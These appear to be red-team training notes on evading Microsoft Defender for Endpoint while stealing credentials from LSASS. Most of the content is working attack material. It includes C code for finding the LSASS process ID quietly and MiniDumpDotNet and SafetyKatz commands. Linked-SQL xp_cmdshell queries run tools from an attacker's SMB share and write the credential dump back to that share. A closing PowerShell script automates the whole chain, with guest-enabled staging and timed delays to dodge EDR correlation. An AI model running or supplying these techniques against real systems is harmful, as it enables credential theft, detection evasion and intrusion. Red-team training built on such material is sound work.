MDE
Endpoint Detection and Response (EDR) systems protect individual machines by continuously monitoring for malicious behavior and correlating events to detect attacker tactics, techniques, and procedures (TTPs). They go beyond traditional antivirus by analyzing behavior over time, so a sequence of actions can be flagged even when no single action is malicious on its own. Microsoft Defender for Endpoint (MDE), Microsoft's native EDR, collects telemetry from the operating system and evaluates it with cloud-based analytics to identify suspicious patterns across endpoints.
LSASS Dump
Direct interaction with the LSASS process, particularly for credential extraction, is heavily monitored by MDE. Many tools dump LSASS memory by opening a process handle with read access and invoking MiniDumpWriteDump from dbghelp.dll; both the handle acquisition and the call to the standard dump API are well-known telemetry and are easily detected. A more OPSEC-conscious approach is to create the dump covertly and exfiltrate it for offline analysis, so that credential parsing never happens on the monitored host.
MiniDumpDotNet provides an alternative that avoids calling the standard dump API. It implements its own version of MiniDumpWriteDump and supports .NET CLR injection into LSASS, allowing execution via a standalone binary, PowerShell reflection (Assembly.Load()), or even JScript/VBS loaders. It can dump processes other than LSASS as well, including Outlook, which may hold plaintext credentials in memory.
.\minidumpdotnet.exe <lsass-PID> <dump-output-path>
Even identifying the LSASS PID with commands like tasklist /v can trigger alerts in MDE, because a process-enumeration command spawned from an unusual parent is itself a signal. To reduce visibility, enumerate processes with native WinAPI calls instead. For example, taking a snapshot with CreateToolhelp32Snapshot and looping through it with Process32Next resolves a process ID without spawning any command-line tool:
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <wchar.h>

// Resolve a PID by image name via the Toolhelp snapshot API rather than by
// spawning tasklist.exe. The explicit W variants keep the comparison correct
// whether or not UNICODE is defined at build time.
DWORD FindPID(const wchar_t* procname) {
    DWORD pid = 0;
    PROCESSENTRY32W proc = {0};
    proc.dwSize = sizeof(PROCESSENTRY32W);
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) return 0;
    BOOL bProc = Process32FirstW(snapshot, &proc);
    while (bProc) {
        // case-insensitive match on the image name (e.g. "lsass.exe")
        if (_wcsicmp(procname, proc.szExeFile) == 0) {
            pid = proc.th32ProcessID;
            break;
        }
        bProc = Process32NextW(snapshot, &proc);
    }
    CloseHandle(snapshot);  // release the snapshot handle
    return pid;
}

int main(void) {
    printf("[+] LSASS PID: %lu\n", FindPID(L"lsass.exe"));
    return 0;
}
Embedding this logic within a known tool like MiniDumpDotNet can lead to detection, but compiling it separately as a standalone binary typically evades both Defender AV and MDE.
File Transfers
Tool staging and execution methods also influence detection. Downloading binaries over HTTP(S) raises red flags unless the download is masqueraded as one made by a legitimate binary such as msedge.exe. A cleaner method is to host the tools on an SMB share with Everyone granted read/write access and execute them directly from the UNC path, so nothing is written to the target's disk. Note that the process-creation event on the target still records the UNC image path, and the share must be reachable from the target over SMB.
Detection Chains
EDRs such as MDE correlate actions within tight timeframes. Chaining multiple suspicious operations can trigger detections, even if each action alone appears benign. Introducing delays between commands (e.g., 10 minutes) or interleaving benign activity (like harmless SQL queries) helps break detection logic.
Lateral Movement
When moving laterally, MDE heavily monitors built-in methods like PsExec, WMI, and PowerShell Remoting, in part through ASR (Attack Surface Reduction) rules such as "Block process creations originating from PSExec and WMI commands". The rule logic is implemented as Lua-based detection scripts shipped inside the Defender signature files, which can be extracted from a target system and analyzed directly. Alternatives such as winrs offer reduced visibility in MDE but may still be flagged by Microsoft Defender for Identity (MDI), which watches the authentication traffic rather than the endpoint.
Example
A full LSASS dumping workflow over a linked SQL Server can be performed covertly using MSSQL's xp_cmdshell. Begin by enabling the Guest account on the host that will serve the share, if needed, so that the target's SQL service account can reach the share without credentials:
# Enable guest access
net user guest /active:yes
Next, create a network share (e.g., studentshare337) with Read/Write permissions for Everyone and copy the binaries to it. Dumping begins by resolving the LSASS PID via the custom utility over the SQL link:
# Execute the binary on the target
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\DCORP-STD337.dollarcorp.moneycorp.local\studentshare337\FindLSASSPID.exe''' -QueryTarget eu-sql23
Instance : EU-SQL23
CustomQuery : {[+] LSASS PID: 708, }
To break correlation, follow with a benign command:
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT @@version' -QueryTarget eu-sql23
Then perform the LSASS dump, writing the output directly to the share:
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\host\share\minidumpdotnet.exe 708 \\host\share\lsass.dmp''' -QueryTarget eu-sql23
After exfiltration, the dump can be parsed offline using SafetyKatz:
.\SafetyKatz.exe "sekurlsa::minidump c:\path\to\lsass.dmp" "sekurlsa::evasive-keys" "exit"
This approach minimizes footprint, avoids standard telemetry triggers, and maintains operational control in environments actively defended by MDE and MDI.
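As an added, end-to-end example (not code from the course page, PowerUpSQL or MiniDumpDotNet), the PowerShell script below ties the staging and detection-chain advice together: it builds the Everyone read/write share on the student host, enables Guest, and then drives the linked-SQL workflow with a ten-minute delay and a benign query between the PID lookup and the dump. It assumes PowerUpSQL is importable from the current directory, that the two tool binaries sit beside the script, and that the instance, target, share and backing-directory names (taken from the example above or chosen here) are replaced with real values.

```powershell
Import-Module .\PowerUpSQL.psd1   # assumed path; PowerUpSQL provides Get-SQLServerLinkCrawl

function New-StagingShare {
    # Create the Everyone read/write share that the target will execute from and write to.
    param(
        [string]$Name  = 'studentshare337',     # share name from the example above
        [string]$Path  = 'C:\studentshare337',  # assumed local directory backing the share
        [string[]]$Tools = @('.\FindLSASSPID.exe', '.\minidumpdotnet.exe')
    )
    New-Item -ItemType Directory -Path $Path -Force | Out-Null
    # Enable Guest so the target's SQL service account can reach the share without credentials
    net user guest /active:yes | Out-Null
    # Both the share ACL and the NTFS ACL must grant Everyone; otherwise xp_cmdshell on the
    # target can read the binaries but cannot write lsass.dmp back to the share
    if (-not (Get-SmbShare -Name $Name -ErrorAction SilentlyContinue)) {
        New-SmbShare -Name $Name -Path $Path -FullAccess 'Everyone' | Out-Null
    }
    icacls $Path /grant 'Everyone:(OI)(CI)F' | Out-Null
    Copy-Item -Path $Tools -Destination $Path -Force
    return "\\$env:COMPUTERNAME\$Name"
}

function New-CmdShellQuery([string]$Command) {
    # Wrap a command for xp_cmdshell; single quotes inside a T-SQL string literal are doubled
    $escaped = $Command.Replace("'", "''")
    return "exec master..xp_cmdshell '$escaped'"
}

function Invoke-LinkedLsassDump {
    param(
        [string]$Instance    = 'dcorp-mssql',
        [string]$QueryTarget = 'eu-sql23',
        [Parameter(Mandatory)][string]$Share,   # UNC path returned by New-StagingShare
        [int]$DelaySeconds   = 600              # ten minutes between the suspicious stages
    )
    # Stage 1: resolve the LSASS PID with the standalone snapshot utility
    $r = Get-SQLServerLinkCrawl -Instance $Instance -QueryTarget $QueryTarget `
             -Query (New-CmdShellQuery "$Share\FindLSASSPID.exe")
    $text = @($r.CustomQuery) -join ' '
    if ($text -match 'LSASS PID:\s*(\d+)') {
        $lsassPid = [int]$Matches[1]      # $pid itself is a read-only automatic variable
    } else {
        throw "Could not resolve LSASS PID from: $text"
    }

    # Break the correlation window: wait, run something boring over the same link, wait again
    Start-Sleep -Seconds $DelaySeconds
    Get-SQLServerLinkCrawl -Instance $Instance -QueryTarget $QueryTarget -Query 'SELECT @@version' | Out-Null
    Start-Sleep -Seconds $DelaySeconds

    # Stage 2: dump LSASS straight to the share; nothing is written to the target's disk
    Get-SQLServerLinkCrawl -Instance $Instance -QueryTarget $QueryTarget `
        -Query (New-CmdShellQuery "$Share\minidumpdotnet.exe $lsassPid $Share\lsass.dmp") | Out-Null
    return "$Share\lsass.dmp"
}

$share = New-StagingShare
$dump  = Invoke-LinkedLsassDump -Share $share
Write-Host "[+] Dump written to $dump; parse it offline with SafetyKatz (sekurlsa::minidump)"
```

Run it from the student host that serves the share. The two Start-Sleep calls are the page's suggested ten-minute gap; the benign SELECT @@version between them is the interleaved activity that keeps the PID lookup and the dump from landing in the same correlation window.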